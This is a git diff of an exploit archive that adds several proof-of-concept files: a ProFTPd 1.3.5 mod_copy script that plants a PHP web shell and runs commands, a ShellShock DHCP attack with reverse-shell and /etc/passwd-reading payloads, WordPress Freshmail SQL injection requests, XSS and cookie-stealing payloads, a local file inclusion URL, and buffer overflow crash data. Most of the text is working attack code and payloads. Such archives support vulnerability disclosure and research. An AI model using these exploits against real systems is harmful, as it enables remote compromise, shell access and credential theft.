Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
Ilient SysAid 8.5.05 is vulnerable; other versions may also be affected.
|
||||
|
||||
HTML injection:
|
||||
<tablewidth="100%"cellspacing="5"cellpadding="5"border="0"class="Maxed">
|
||||
<tbody><trvalign="top"><tdwidth="50%"style="padding:10px;"id="Container_1"><tableclass="MaxedContainerContainer_1">
|
||||
<tbody><tr>
|
||||
<tdclass="Container_Header">
|
||||
<table>
|
||||
<tbody><tr>
|
||||
<tdclass="Container_Header_First">
|
||||
<tdclass="Container_Header_Center">
|
||||
Administratorsonline
|
||||
</td><tdclass="Container_Header_Last">
|
||||
</td>
|
||||
|
||||
</tr>
|
||||
</tbody></table></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<tdclass="Container_Body">
|
||||
<divclass="BorderFix_FFForm_Ctrl_Label">
|
||||
<br/>
|
||||
1Users<br/>
|
||||
JulienAhrens<EXCUTES PERSISTENT SCRIPt CODE HERE!></div></td></tr></tbody></table></td></tr></tbody>
|
||||
</table></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></body></html>
|
||||
|
||||
|
||||
|
||||
Cross-site scripting:
|
||||
|
||||
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName=<script>alert(document.cookie)</script>
|
||||
|
||||
or base64 encoded:
|
||||
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName= ()
|
||||
BASE64@PHNjcmlwdD5hb
|
||||
GVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4=
|
||||
|
||||
|
||||
|
||||
Non-persistent(listViewName):
|
||||
|
||||
<tdcolspan="6"class="Frame_Body_Center">
|
||||
<tablewidth="100%"border="0"class="Maxed">
|
||||
|
||||
<tbody><trvalign="top">
|
||||
<tdstyle="padding:10px;"id="Conainer_1">
|
||||
<tablewidth=""cellspacing="0"cellpadding="0"border="0">
|
||||
<tbody><tr>
|
||||
<td>
|
||||
<tablewidth="100%"cellspacing="0"cellpadding="0"border="0"class="MaxedContainerContainer_1">
|
||||
|
||||
<tbody><tr>
|
||||
<tdclass="Container_Header">
|
||||
|
||||
<table>
|
||||
<tbody><tr>
|
||||
<tdclass="Container_Header_First"/>
|
||||
<tdclass="Container_Header_Center">
|
||||
<palign="center"style="font-size:16px;">Customizelist-Assets-<EXCUTES PERSISTENT SCRIPt CODE HERE>
|
||||
|
||||
</p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr>
|
||||
</tbody></table></td></tr></tbody></table></form></body></html>
|
47
platforms/linux/remote/36803.py
Executable file
47
platforms/linux/remote/36803.py
Executable file
|
@ -0,0 +1,47 @@
|
|||
# Title: ProFTPd 1.3.5 Remote Command Execution
|
||||
# Date : 20/04/2015
|
||||
# Author: R-73eN
|
||||
# Software: ProFTPd 1.3.5 with mod_copy
|
||||
# Tested : Kali Linux 1.06
|
||||
# CVE : 2015-3306
|
||||
# Greetz to Vadim Melihow for all the hard work .
|
||||
import socket
|
||||
import sys
|
||||
import requests
|
||||
#Banner
|
||||
banner = ""
|
||||
banner += " ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
if(len(sys.argv) < 4):
|
||||
print '\n Usage : exploit.py server directory cmd'
|
||||
else:
|
||||
server = sys.argv[1] #Vulnerable Server
|
||||
directory = sys.argv[2] # Path accessible from web .....
|
||||
cmd = sys.argv[3] #PHP payload to be executed
|
||||
evil = '<?php system("' + cmd + '") ?>'
|
||||
s.connect((server, 21))
|
||||
s.recv(1024)
|
||||
print '[ + ] Connected to server [ + ] \n'
|
||||
s.send('site cpfr /etc/passwd')
|
||||
s.recv(1024)
|
||||
s.send('site cpto ' + evil)
|
||||
s.recv(1024)
|
||||
s.send('site cpfr /proc/self/fd/3')
|
||||
s.recv(1024)
|
||||
s.send('site cpto ' + directory + 'infogen.php')
|
||||
s.recv(1024)
|
||||
s.close()
|
||||
print '[ + ] Payload sended [ + ]\n'
|
||||
print '[ + ] Executing Payload [ + ]\n'
|
||||
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
|
||||
if (r.status_code == 200):
|
||||
print '[ * ] Payload Executed Succesfully [ * ]'
|
||||
else:
|
||||
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
|
||||
|
||||
print '\n http://infogen.al/'
|
97
platforms/linux/remote/36933.py
Executable file
97
platforms/linux/remote/36933.py
Executable file
|
@ -0,0 +1,97 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
|
||||
# Date: 2014-09-29
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 4.1
|
||||
# Tested on: Debian, Ubuntu, Kali
|
||||
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
|
||||
from scapy.all import *
|
||||
|
||||
conf.checkIPaddr = False
|
||||
fam,hw = get_if_raw_hwaddr(conf.iface)
|
||||
victim_assign_ip = "10.0.1.100"
|
||||
server_ip = "10.0.1.2"
|
||||
gateway_ip = "10.0.1.2"
|
||||
subnet_mask = "255.255.255.0"
|
||||
dns_ip = "8.8.8.8"
|
||||
spoofed_mac = "00:50:56:c0:00:01"
|
||||
payload = "() { ignored;}; echo 'moo'"
|
||||
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
|
||||
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
|
||||
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
|
||||
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
|
||||
rce = payload_5
|
||||
|
||||
def toMAC(strMac):
|
||||
cmList = strMac.split(":")
|
||||
hCMList = []
|
||||
for iter1 in cmList:
|
||||
hCMList.append(int(iter1, 16))
|
||||
hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
|
||||
return hMAC
|
||||
|
||||
def detect_dhcp(pkt):
|
||||
# print 'Process ', ls(pkt)
|
||||
if DHCP in pkt:
|
||||
# if DHCP Discover then DHCP Offer
|
||||
if pkt[DHCP].options[0][1]==1:
|
||||
clientMAC = pkt[Ether].src
|
||||
print "DHCP Discover packet detected from " + clientMAC
|
||||
|
||||
sendp(
|
||||
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
|
||||
IP(src=server_ip,dst="255.255.255.255")/
|
||||
UDP(sport=67,dport=68)/
|
||||
BOOTP(
|
||||
op=2,
|
||||
yiaddr=victim_assign_ip,
|
||||
siaddr=server_ip,
|
||||
giaddr=gateway_ip,
|
||||
chaddr=toMAC(clientMAC),
|
||||
xid=pkt[BOOTP].xid,
|
||||
sname=server_ip
|
||||
)/
|
||||
DHCP(options=[('message-type','offer')])/
|
||||
DHCP(options=[('subnet_mask',subnet_mask)])/
|
||||
DHCP(options=[('name_server',dns_ip)])/
|
||||
DHCP(options=[('lease_time',43200)])/
|
||||
DHCP(options=[('router',gateway_ip)])/
|
||||
DHCP(options=[('dump_path',rce)])/
|
||||
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
|
||||
)
|
||||
print "DHCP Offer packet sent"
|
||||
|
||||
# if DHCP Request than DHCP ACK
|
||||
if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
|
||||
clientMAC = pkt[Ether].src
|
||||
print "DHCP Request packet detected from " + clientMAC
|
||||
|
||||
sendp(
|
||||
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
|
||||
IP(src=server_ip,dst="255.255.255.255")/
|
||||
UDP(sport=67,dport=68)/
|
||||
BOOTP(
|
||||
op=2,
|
||||
yiaddr=victim_assign_ip,
|
||||
siaddr=server_ip,
|
||||
giaddr=gateway_ip,
|
||||
chaddr=toMAC(clientMAC),
|
||||
xid=pkt[BOOTP].xid
|
||||
)/
|
||||
DHCP(options=[('message-type','ack')])/
|
||||
DHCP(options=[('subnet_mask',subnet_mask)])/
|
||||
DHCP(options=[('lease_time',43200)])/
|
||||
DHCP(options=[('router',gateway_ip)])/
|
||||
DHCP(options=[('name_server',dns_ip)])/
|
||||
DHCP(options=[('dump_path',rce)])/
|
||||
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
|
||||
)
|
||||
print "DHCP Ack packet sent"
|
||||
|
||||
def main():
|
||||
#sniff DHCP requests
|
||||
sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1")
|
||||
|
||||
if __name__ == '__main__':
|
||||
sys.exit(main())
|
88
platforms/multiple/webapps/36930.txt
Executable file
88
platforms/multiple/webapps/36930.txt
Executable file
|
@ -0,0 +1,88 @@
|
|||
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
|
||||
# Google Dork: N/A
|
||||
# Date: 05/05/2015
|
||||
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
|
||||
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
|
||||
# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
|
||||
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
|
||||
# CVE : N/A
|
||||
# Category: webapps
|
||||
|
||||
1. Summary
|
||||
------------------
|
||||
|
||||
Freshmail plugin is an email marketing plugin for wordpress, allowing the
|
||||
administrator to create mail campaigns and keep track of them.
|
||||
|
||||
There is a unauthenticated SQL injection vulnerability in the "Subscribe to
|
||||
our newsletter" formularies showed to the web visitors in the POST
|
||||
parameter *fm_form_id. *
|
||||
|
||||
2. Vulnerability timeline
|
||||
----------------------------------
|
||||
|
||||
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
|
||||
by twitter.
|
||||
- 05/05/2015: Send the details by mail to developer.
|
||||
|
||||
- 05/05/2015: Response from the developer.
|
||||
- 06/05/2015: Fixed version in 1.6
|
||||
|
||||
3. Vulnerable code
|
||||
---------------------------
|
||||
|
||||
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
|
||||
|
||||
[...]
|
||||
Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
|
||||
Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
|
||||
[...]
|
||||
Line 44: $result =3D $_POST;
|
||||
[...]
|
||||
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
|
||||
where form_id=3D"'.*$result['fm_form_id']*.'";');
|
||||
[...]
|
||||
|
||||
3. Proof of concept
|
||||
---------------------------
|
||||
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: <web>
|
||||
X-Requested-With: XMLHttpRequest
|
||||
[...]
|
||||
Cookie: wordpress_f30[...]
|
||||
|
||||
form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
|
||||
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
|
||||
|
||||
4. Explanation
|
||||
---------------------
|
||||
|
||||
A page visitor can submit an email (fake@fake.com) to subscribe to the
|
||||
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
|
||||
ar
|
||||
to:
|
||||
|
||||
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
|
||||
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
|
||||
uccess","message":"*Your
|
||||
sign up request was successful! Please check your email inbox.*"}
|
||||
|
||||
The second time he tries to do the same with the same email the message
|
||||
returned will be:
|
||||
|
||||
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
|
||||
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
|
||||
uccess","message":"*Given
|
||||
email address is already subscribed, thank you!*"}
|
||||
|
||||
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
|
||||
me
|
||||
message indicating that the Given email is already subscribed indicating
|
||||
that the first character of the username is an "a" or a null message
|
||||
indicating that the username first character is not an "a".
|
||||
|
||||
5. Solution
|
||||
---------------
|
||||
|
||||
Update to version 1.6
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability
|
||||
# Date: 2010-08-11
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Software Link: http://www.knowledgetree.com/products/community/download
|
||||
# Version: 3.5.2
|
||||
# Notes: Fixed in the last version.
|
||||
|
|
7
platforms/php/webapps/36926.txt
Executable file
7
platforms/php/webapps/36926.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/52347/info
|
||||
|
||||
LeKommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/path/secc.php?id={sqli}
|
11
platforms/php/webapps/36927.txt
Executable file
11
platforms/php/webapps/36927.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/52350/info
|
||||
|
||||
ToendaCMS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
|
||||
|
||||
The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
ToendaCMS 1.6.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/setup/index.php?site=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/s
|
30
platforms/php/webapps/36937.html
Executable file
30
platforms/php/webapps/36937.html
Executable file
|
@ -0,0 +1,30 @@
|
|||
source: http://www.securityfocus.com/bid/52377/info
|
||||
|
||||
phpMyVisites is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
phpMyVisites 2.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>Warning! This is Proof Of Concept Exploit for phpMyVisites 2.4 (version.php 238 2009-12-16 19:48:15Z matthieu_ $)</title>
|
||||
</head>
|
||||
<h1> Warning! This is a Proof Of Concept Exploit for phpMyVisites 2.4:<br/></h1>
|
||||
<p>// $Id: version.php 238 2009-12-16 19:48:15Z matthieu_ $
|
||||
PHPMV_VERSION 2.4
|
||||
</p>
|
||||
</h1>
|
||||
<body onload="javascript:document.forms[0].submit()">
|
||||
|
||||
<form action="http://CHANGE_TO_RTARGET/phpmv2/index.php?mod=install_database_setup" method="post" name="form_phpmv" id="form_phpmv">
|
||||
<input value="<script>alert(document.cookie);</script>" name="form_dblogin" type="hidden" />
|
||||
<input value="<script>alert(document.cookie);</script>" name="form_dbpassword" type="hidden" />
|
||||
<input value="<script>alert(document.cookie);</script>" name="form_dbhost" type="hidden" />
|
||||
<input value="<script>alert(document.cookie);</script>" name="form_dbname" type="hidden" />
|
||||
<input value="<script>alert(document.cookie);</script>" name="form_dbprefix" type="hidden"/></td>
|
||||
|
||||
<!--- Author: AkaStep -->
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
9
platforms/php/webapps/36938.txt
Executable file
9
platforms/php/webapps/36938.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/52399/info
|
||||
|
||||
singapore is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
singapore 0.10.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/patch/index.php?gallery=<script>alert('31337')</script>
|
215
platforms/php/webapps/36942.txt
Executable file
215
platforms/php/webapps/36942.txt
Executable file
|
@ -0,0 +1,215 @@
|
|||
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
|
||||
# Google Dork: N/A
|
||||
# Date: 05/05/2015
|
||||
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
|
||||
# Vendor Homepage:
|
||||
*http://freshmail.com/ <http://freshmail.com/> *
|
||||
# Software Link:
|
||||
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
|
||||
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
|
||||
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
|
||||
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
|
||||
2.4.0 (Ubuntu)
|
||||
# CVE : N/A
|
||||
# Category: webapps
|
||||
|
||||
1. Summary
|
||||
------------------
|
||||
|
||||
Freshmail plugin is an email marketing plugin for wordpress, allowing the
|
||||
administrator to create mail campaigns and keep track of them.
|
||||
|
||||
There is a SQL Injection vulnerability available for collaborators (or
|
||||
higher privileged users) for webs with freshmail plugin installed. The SQL
|
||||
Injection in located in the attribute "id" of the inserted shortcode
|
||||
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
|
||||
inserting it in a SQL query.
|
||||
|
||||
A collaborator can insert shortcodes when he/she is editing a new post or
|
||||
page and can preview the results (no administrator approval needed),
|
||||
launching this SQL Injection.
|
||||
|
||||
|
||||
2. Vulnerability timeline
|
||||
----------------------------------
|
||||
|
||||
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
|
||||
by twitter.
|
||||
- 05/05/2015: Send the details by mail to developer.
|
||||
|
||||
- 05/05/2015: Response from the developer.
|
||||
- 06/05/2015: Fixed version in 1.6
|
||||
|
||||
3. Vulnerable code
|
||||
---------------------------
|
||||
|
||||
Vulnerable File: include/shortcode.php, lines 27 and 120:
|
||||
|
||||
Line 19: function fm_form_func($atts)
|
||||
[...]
|
||||
Line 27: $form_value = $wpdb->get_row("select * from
|
||||
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
|
||||
[...]
|
||||
Line 120: add_shortcode('FM_form', 'fm_form_func');
|
||||
|
||||
|
||||
3. Proof of concept
|
||||
---------------------------
|
||||
|
||||
1. As collaborator, start a new post.
|
||||
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
|
||||
3. Click preview.
|
||||
4. If the form is shown, the statement is true, if not, false.
|
||||
|
||||
POST /wp-admin/post.php HTTP/1.1
|
||||
Host: <web>
|
||||
Content-Length: 3979
|
||||
Accept:
|
||||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Origin: <web>
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
|
||||
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.8,es;q=0.6
|
||||
Cookie: wordpress_f305[...]
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="_wpnonce"
|
||||
|
||||
0a75a3666b
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="_wp_http_referer"
|
||||
|
||||
/wp-admin/post.php?post=69&action=edit&message=8
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="user_ID"
|
||||
|
||||
4
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
||||
editpost
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="originalaction"
|
||||
|
||||
editpost
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_author"
|
||||
|
||||
4
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_type"
|
||||
|
||||
post
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="original_post_status"
|
||||
|
||||
pending
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="referredby"
|
||||
|
||||
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="_wp_original_http_referer"
|
||||
|
||||
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_ID"
|
||||
|
||||
69
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="meta-box-order-nonce"
|
||||
|
||||
f8aa04e508
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="closedpostboxesnonce"
|
||||
|
||||
ebf65a43ed
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_title"
|
||||
|
||||
Testing SQLi in shortcode
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="samplepermalinknonce"
|
||||
|
||||
e753a2d8f2
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="content"
|
||||
|
||||
[FM_form id='1" and substr(user(),1,1)="b]
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="wp-preview"
|
||||
|
||||
dopreview
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="original_publish"
|
||||
|
||||
Submit for Review
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_format"
|
||||
|
||||
0
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_category[]"
|
||||
|
||||
0
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_category[]"
|
||||
|
||||
1
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="tax_input[post_tag]"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="newtag[post_tag]"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="excerpt"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="trackback_url"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="metakeyselect"
|
||||
|
||||
#NONE#
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="metakeyinput"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="metavalue"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
|
||||
|
||||
6a13a5a808
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="advanced_view"
|
||||
|
||||
1
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="comment_status"
|
||||
|
||||
open
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="ping_status"
|
||||
|
||||
open
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL--
|
||||
|
||||
|
||||
5. Solution
|
||||
---------------
|
||||
|
||||
Update to version 1.6
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
|
||||
# Date: 2010-08-14
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 2.6
|
||||
# Tested on: Windows 2003 Server SP1 en
|
||||
# CVE: CVE-2007-3336 - CVE-2007-3338
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
|
||||
# Date: 2010-07-28
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 3.1.2.2 2010.04.15
|
||||
# Tested on Windows XP SP3 en
|
||||
|
||||
|
|
|
@ -3,8 +3,8 @@
|
|||
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (SEH)
|
||||
# WINDOWS XP SP3 EN Fully Patched
|
||||
# Bug found by http://www.exploit-db.com/exploits/15248/
|
||||
# POC and Exploit by fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# POC and Exploit by @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# This POC was already been released here (without proper shellcode): http://www.exploit-db.com/winamp-5-58-from-dos-to-code-execution/
|
||||
# We later gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn't sleep and decided to finish cooking this version.
|
||||
# Further References:
|
||||
|
|
75
platforms/windows/local/36928.py
Executable file
75
platforms/windows/local/36928.py
Executable file
|
@ -0,0 +1,75 @@
|
|||
source: http://www.securityfocus.com/bid/52351/info
|
||||
|
||||
Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
|
||||
|
||||
Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.
|
||||
|
||||
Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
# Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
|
||||
# Version: 7.5.0
|
||||
# Date: 2012-03-04
|
||||
# Author: Julien Ahrens
|
||||
# Homepage: http://www.inshell.net
|
||||
# Software Link: http://www.macrotoolworks.com
|
||||
# Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
|
||||
# Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way.
|
||||
# Howto: Copy options.ini to App-Dir --> Launch
|
||||
|
||||
# 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242
|
||||
(exc.code c0000005, tid 3128)
|
||||
|
||||
# Registers:
|
||||
# EAX 0120EA00 Stack[000004C8]:0120EA00
|
||||
# EBX FFFFFFFF
|
||||
# ECX 42424242
|
||||
# EDX 00000002
|
||||
# ESI 007F6348 _prog.exe:007F6348
|
||||
# EDI 007F6348 _prog.exe:007F6348
|
||||
# EBP 0120EA0C Stack[000004C8]:0120EA0C
|
||||
# ESP 0120E9E8 Stack[000004C8]:0120E9E8
|
||||
# EIP 00646D36 _prog.exe:00646D36
|
||||
# EFL 00200206
|
||||
|
||||
# Stack:
|
||||
# 0120E9E0 0012DF3C
|
||||
# 0120E9E4 00000000
|
||||
# 0120E9E8 0205A5A0 debug045:0205A5A0
|
||||
# 0120E9EC 1B879EF8
|
||||
# 0120E9F0 007F6348 _prog.exe:007F6348
|
||||
# 0120E9F4 007F6348 _prog.exe:007F6348
|
||||
|
||||
# Crash:
|
||||
# _prog.exe:00646D36 ; ---------------------------------------------------------------------------
|
||||
# _prog.exe:00646D36 mov eax, [ecx]
|
||||
# _prog.exe:00646D38 call dword ptr [eax+0Ch]
|
||||
# _prog.exe:00646D3B call near ptr unk_6750D0
|
||||
# _prog.exe:00646D40 retn 4
|
||||
# _prog.exe:00646D40 ; ---------------------------------------------------------------------------
|
||||
|
||||
# Dump:
|
||||
# 007F6380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||
# 007F6390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||
# 007F63A0 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 BBBBCCCCCCCCCCCC
|
||||
